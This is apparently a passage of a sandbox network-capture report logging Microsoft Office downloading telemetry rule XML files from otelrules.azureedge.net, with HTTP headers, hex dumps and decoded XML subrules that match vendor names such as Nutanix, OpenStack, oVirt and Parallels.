                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            92192.168.2.45001013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:59 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                            x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180000Z-174f7845968swgbqhC1EWRmnb400000016gg00000000391g
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            93192.168.2.45001213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                            x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180000Z-174f7845968cpnpfhC1EWR3afc00000015x000000000cksx
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            94192.168.2.45001313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:01 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                            x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180001Z-174f7845968pght8hC1EWRyvxg00000009fg000000005cg2
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:01 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            95192.168.2.45002113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:02 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                            x-ms-request-id: b2539df8-c01e-008e-4522-457381000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180002Z-174f7845968xlwnmhC1EWR0sv8000000161000000000pf8d
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            96192.168.2.45002213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:02 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                            x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180002Z-174f7845968xr5c2hC1EWRd0hn0000000r2g00000000hzbb
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            97192.168.2.45002313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:02 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                            x-ms-request-id: b69fee9c-d01e-0028-6253-437896000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180002Z-174f7845968psccphC1EWRuz9s00000016h000000000cwgk
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            98192.168.2.45002413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:02 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180002Z-174f7845968n2hr8hC1EWR9cag00000015zg000000004zpn
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            99192.168.2.45002513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:03 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:03 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180003Z-174f78459688l8rvhC1EWRtzr00000000kw000000000crxs
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:03 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            100192.168.2.45003613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:04 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                            x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180004Z-174f78459688l8rvhC1EWRtzr00000000ku000000000my6z
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
